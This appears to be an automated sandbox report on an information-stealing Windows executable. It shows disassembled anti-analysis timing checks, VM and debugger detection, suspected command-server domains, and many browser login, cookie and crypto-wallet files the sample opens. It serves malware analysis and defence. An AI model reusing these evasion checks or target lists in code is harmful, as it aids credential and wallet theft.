            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06BA second address: 52C06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ecx, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06CC second address: 52C06DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06DE second address: 52C0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F377C5325F1h 0x00000009 jmp 00007F377C5325EBh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F377C5325F8h 0x00000015 sbb ah, 00000078h 0x00000018 jmp 00007F377C5325EBh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 jns 00007F377C53263Ch 0x00000027 pushad 0x00000028 call 00007F377C5325EBh 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 popad 0x00000031 add eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0747 second address: 52C074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C074E second address: 52C0791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 241Ch 0x00000007 pushfd 0x00000008 jmp 00007F377C5325F5h 0x0000000d adc esi, 7E01A676h 0x00000013 jmp 00007F377C5325F1h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ecx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov esi, edi 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01E9 second address: 52B01F7 instructions: 0x00000000 rdtsc 0x00000002 mov ah, E9h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01F7 second address: 52B01FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01FB second address: 52B01FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01FF second address: 52B0205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0205 second address: 52B020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B020B second address: 52B020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B020F second address: 52B02AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov cx, 3331h 0x0000000e pushfd 0x0000000f jmp 00007F377CE4798Eh 0x00000014 or cx, E308h 0x00000019 jmp 00007F377CE4798Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F377CE47996h 0x00000027 sub esp, 2Ch 0x0000002a pushad 0x0000002b movzx esi, di 0x0000002e mov si, bx 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F377CE47990h 0x0000003a jmp 00007F377CE47995h 0x0000003f popfd 0x00000040 mov eax, 69842137h 0x00000045 popad 0x00000046 mov dword ptr [esp], ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F377CE47999h 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02AE second address: 52B02BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325ECh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02BE second address: 52B02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F377CE47993h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B038B second address: 52B03C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F377C5325EDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub edi, edi 0x0000000f jmp 00007F377C5325F7h 0x00000014 inc ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03C0 second address: 52B03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03C4 second address: 52B03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03C8 second address: 52B03CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03CE second address: 52B03EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 621Fh 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F377C5325EDh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03EB second address: 52B044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BFh 0x00000005 mov ax, 5BFFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F377CE47C35h 0x00000012 pushad 0x00000013 mov esi, 263FCBF7h 0x00000018 mov eax, 709B3093h 0x0000001d popad 0x0000001e lea ecx, dword ptr [ebp-14h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F377CE47994h 0x00000028 sbb ax, 7518h 0x0000002d jmp 00007F377CE4798Bh 0x00000032 popfd 0x00000033 mov di, si 0x00000036 popad 0x00000037 mov dword ptr [ebp-14h], edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F377CE4798Ch 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B044A second address: 52B0450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0450 second address: 52B0456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0456 second address: 52B045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04C6 second address: 52B04CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04CC second address: 52B04D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6ED84C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6ED4DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 533E43 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6F9B71 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 77E989 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 7556 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7568 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, 00000000.00000002.1851706509.00000000006D1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.000000000128A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000128A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852411307.000000000120E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1851706509.00000000006D1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.1690697919.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.0000000001271000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW$
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: spirittunek.stor
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: bathdoomgaz.stor
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: studennotediw.stor
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: dissapoiznw.stor
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: eaglepawnoy.stor
Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: mobbipenju.stor
Source: file.exe, 00000000.00000002.1851840993.0000000000715000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: rProgram Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000002.1853114151.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1857713084.0000000005BD5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851374834.0000000005BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851390062.0000000005BD4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788509424.00000000012E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 7436, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe | String found in binary or memory: Wallets/Electrum
Source: file.exe | String found in binary or memory: Wallets/ElectronCash
Source: file.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe | String found in binary or memory: window-state.json
Source: file.exe | String found in binary or memory: ExodusWeb3
Source: file.exe | String found in binary or memory: Wallets/Ethereum
Source: file.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
